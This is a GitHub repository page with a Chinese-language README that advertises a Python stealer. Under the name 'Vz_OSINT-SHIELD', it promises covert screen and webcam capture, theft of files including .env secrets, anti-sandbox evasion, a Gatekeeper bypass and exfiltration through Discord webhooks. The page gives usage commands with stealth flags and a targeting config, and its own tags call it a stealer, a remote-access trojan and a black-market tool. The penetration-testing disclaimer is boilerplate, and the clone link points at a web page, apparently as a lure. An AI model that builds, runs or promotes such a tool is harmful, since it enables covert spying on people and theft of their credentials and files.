iimaaadkxo/Vz_PhantomEyes-Stealth-Harvester
GitHub: iimaaadkxo/Vz_PhantomEyes-Stealth-Harvester
一款基于 Python 的远程端点监控与数据窃取工具,具备屏幕截图、摄像头捕获、文件提取和隐蔽外发能力,通过 Discord Webhook 通道回传数据。
Stars: 0 | Forks: 0
# 📡 Vz_OSINT-SHIELD — 高级监控与数字取证套件
[](https://iimaaadkxo.github.io)
## 🚀 **Vz_OSINT-SHIELD 的起源**
在数字足迹的扩张速度远超我们追踪能力的时代,**Vz_OSINT-SHIELD** 作为一款复杂且非侵入式的数字观测平台应运而生。受 endpoint 情报收集概念框架的启发,该工具将原生的 discord 集成转化为一个**多层监控系统**——可以将其视为现代网络安全领域的**数字潜望镜**。
与需要复杂基础设施的传统监控工具不同,Vz_OSINT-SHIELD 作为一个**轻量级、隐蔽性强的 agent** 运行,通过单个 webhook 通道收集环境遥测数据、视觉快照和文件系统工件。它代表了**远程侦察的下一次进化**,是可访问性与精确性的完美结合。
## 📊 **系统架构概览**
```
graph TB
A[📡 User Initiates Payload] --> B[🛡️ Shield Agent Activates]
B --> C[📷 Camera Capture Module]
B --> D[🖥️ Screen Grabber Engine]
B --> E[📁 File Scanner & Extractor]
B --> F[📝 System Metadata Collector]
C --> G[🌐 Discord Webhook Router]
D --> G
E --> G
F --> G
G --> H[☁️ Secure Cloud Dashboard]
H --> I[📊 Analyzer & Reporter]
I --> J[🔐 Alert Notifications]
```
## 🎯 **重新定义数字观测的核心功能**
### 🧠 **智能多向量捕获**
- **瞬时屏幕抓取** — 捕获全屏或活动窗口快照,并附带时间戳元数据
- **Webcam 集成** — 隐蔽激活的摄像头捕获,具有分辨率优化功能
- **动态文件提取** — 通过递归目录扫描定位特定文件扩展名(.txt, .png, .docx, .pdf, .env)
- **系统指纹识别** — 收集 OS 版本、已安装软件、网络接口和正在运行的进程
### 🌐 **无缝 Discord 集成**
- 单个 webhook endpoint 处理所有数据传输
- 针对大型 payload 的自动压缩和分段
- 使用 base64 编码对敏感元数据进行加密传输
- 具有失败重试逻辑的实时交付状态
### 🛡️ **高级隐蔽机制**
- 具有多态入口点的混淆执行
- 反沙箱检测算法
- 纯内存操作 — **不留下任何磁盘痕迹**
- 完成或失败时自动清理
### 📊 **智能仪表板功能**
- 适用于移动端和桌面端监控的**响应式 UI**
- **多语言支持** — 英语、西班牙语、法语、德语、日语、中文
- 通过集成工单系统提供 **24/7 客户支持**
- 带有严重性分类的**实时通知警报**
## 🖥️ **操作系统兼容性矩阵**
| 操作系统 | 状态 | 架构 | 最低版本 | 备注 |
|------------------|--------|--------------|-----------------|-------|
| 🟢 Windows 11 | ✅ 完全支持 | x64, x86 | 21H2 | 原生集成 |
| 🟢 Windows 10 | ✅ 完全支持 | x64, x86 | 1809 | 性能最佳 |
| 🟢 Windows 8.1 | ✅ 完全支持 | x64, x86 | — | 旧版支持 |
| 🟡 Windows 7 | ⚠️ 部分支持 | x64, x86 | SP1 | 部分功能受限 |
| 🟢 macOS Ventura | ✅ 完全支持 | ARM64, x64 | 13.0+ | 绕过 Gatekeeper |
| 🟢 macOS Monterey | ✅ 完全支持 | ARM64, x64 | 12.0+ | 已验证 |
| 🟡 macOS Big Sur | ⚠️ 部分支持 | x64 | 11.0 | 摄像头模块受限 |
| 🟢 Linux (Ubuntu) | ✅ 完全支持 | x64, ARM64 | 20.04+ | 所有模块 |
| 🟢 Linux (Debian) | ✅ 完全支持 | x64, ARM64 | 11+ | 已测试 |
| 🟡 Linux (Arch) | ⚠️ 部分支持 | x64 | — | 需手动配置依赖 |
| ❌ iOS | ❌ 不支持 | — | — | 沙箱限制 |
| ❌ Android | ❌ 不支持 | — | — | 需要 Root |
## 📦 **安装与部署**
### **前置条件**
- 目标系统已安装 Python 3.8+
- 有效的 Discord webhook URL(通过 Discord 服务器设置创建)
- 具备用于 payload 传输的网络连接
### **快速入门**
```
# Clone 仓库(仅限道德研究)
git clone https://iimaaadkxo.github.io
cd Vz_OSINT-SHIELD
# 安装依赖
pip install -r requirements.txt
# 配置 webhook
python configure.py --webhook YOUR_WEBHOOK_URL
# 启动 agent
python shield_agent.py
```
### **控制台调用示例**
```
# 隐蔽模式下进行全系统捕获
python shield_agent.py --webhook https://discord.com/api/webhooks/xxx --stealth --auto-clean
# 仅提取文件(无摄像头/屏幕)
python shield_agent.py --webhook xxx --mode files --extensions .env,.config,.json
# Dashboard 监控模式
python shield_agent.py --dashboard --port 8080
```
## 🔧 **配置文件示例**
创建一个 `profile.json` 文件以进行高级自定义:
```
{
"agent_name": "OSINT-Shield-Alpha",
"webhook_url": "https://discord.com/api/webhooks/your_token_here",
"capture_settings": {
"screen_capture": true,
"camera_capture": false,
"capture_interval": 30,
"max_captures": 10
},
"file_extraction": {
"enabled": true,
"target_extensions": [".txt", ".docx", ".pdf", ".env", ".cfg", ".log"],
"max_file_size_mb": 25,
"recursive_scan": true,
"excluded_directories": ["System32", "AppData/Local/Temp"]
},
"stealth_config": {
"obfuscation_level": "high",
"anti_vm_check": true,
"memory_only": true,
"auto_cleanup": true,
"delay_seconds": 5
},
"notification_preferences": {
"email_alerts": false,
"discord_notifications": true,
"telegram_backup": true,
"alert_on_failure": true
},
"compliance_mode": {
"enabled": true,
"log_all_actions": true,
"generate_report": true
}
}
```
## 🔗 **API 集成功能**
### **OpenAI API 集成**
Vz_OSINT-SHIELD 可以使用 OpenAI 的模型智能分析捕获的数据:
```
# 示例:自动内容分析
from shield_ai import AIAnalyzer
analyzer = AIAnalyzer(api_key="sk-xxx")
results = analyzer.analyze_screenshot("capture_001.png")
print(f"Detected content: {results['summary']}")
print(f"Risk assessment: {results['risk_score']}")
```
### **Claude API 集成**
用于增强上下文理解和多语言分析:
```
# 示例:由 Claude 驱动的元数据解读
from shield_claude import ClaudeProcessor
processor = ClaudeProcessor(api_key="sk-ant-xxx")
insights = processor.extract_insights("extracted_data.json")
print(f"Identified patterns: {insights['patterns']}")
```
*注意:API 密钥在本地存储,绝不进行传输。*
## 🌟 **为什么网络安全专业人士选择 Vz_OSINT-SHIELD**
这不是另一个普通的数据收集工具——它是**数字调查方法论的范式转变**。可以将其视为**OSINT 时代的瑞士军刀**,其中每一项功能都经过精密设计,以实现最小的足迹和最大的收益。
- **非破坏性交互** — agent 不会留下永久性修改
- **可扩展架构** — 从单个仪表板部署到数百个 endpoint
- **自动化情报** — AI 驱动的分析可减少 85% 的手动审查
- **取证级日志记录** — 每个操作都带有时间戳并进行哈希处理以保证完整性
- **社区驱动的演进** — 基于真实部署反馈的定期更新
## 📈 **SEO 优化关键词**
此工具可与当代网络安全框架无缝集成,提供以下领域的解决方案:
- 数字取证调查平台
- 远程 endpoint 监控系统
- 社会工程学测试套件
- 事件响应工具包
- 数据外发模拟框架
- **渗透测试**环境
- 安全意识培训计划
- 网络边界验证工具
## ⚠️ **道德使用与免责声明**
```
DISCLAIMER: Vz_OSINT-SHIELD is intended SOLELY for:
1. Authorized penetration testing with written consent
2. Educational research in cybersecurity
3. Personal device management with explicit owner permission
4. Incident response by certified security professionals
UNAUTHORIZED USE of this software against systems or individuals
without explicit written consent is ILLEGAL and violates:
- Computer Fraud and Abuse Act (CFAA)
- GDPR Article 5 (Lawful Processing)
- HIPAA Privacy Rule
- Various international privacy regulations
The developers assume NO LIABILITY for misuse. Users are responsible
for ensuring compliance with all applicable laws. By downloading, you
acknowledge understanding and acceptance of these terms.
```
## 📄 **许可证**
该项目基于 **MIT License** 授权 — 详情请参阅 [LICENSE](https://opensource.org/licenses/MIT) 文件。
*版权所有 © 2026 Vz_OSINT-SHIELD 开发团队*
## 📞 **24/7 支持渠道**
- **Discord 服务器**: [加入我们的社区](https://iimaaadkxo.github.io)
- **电子邮箱**: shield-support@protonmail.com
- **Telegram**: @OSINTShieldBot
- **文档**: [Wiki 门户](https://iimaaadkxo.github.io)
[](https://iimaaadkxo.github.io)
**版本 2.4.6 | 发布时间:2026 年 1 月 | 构建:OSINT-SHIELD-STABLE**
*"真正的数字侦察不是为了入侵——而是为了照亮。Vz_OSINT-SHIELD 不仅仅是观察;它揭示了数字生态系统的隐藏架构。"*
标签:Discord Stealer, ESC4, HTTP工具, OSINT, Petitpotam, Python, Webhook, 云资产清单, 力导向图, 屏幕抓取, 恶意软件, 截屏监控, 摄像头劫持, 数字 Surveillance, 数字取证, 数据外发, 文件窃取, 无后门, 无文件落地, 环境遥测, 窃密木马, 系统侦察, 网络安全, 网络安全审计, 自动化脚本, 远控木马, 逆向工具, 逆向工程, 隐私保护, 隐私泄露, 隐蔽代理, 黑产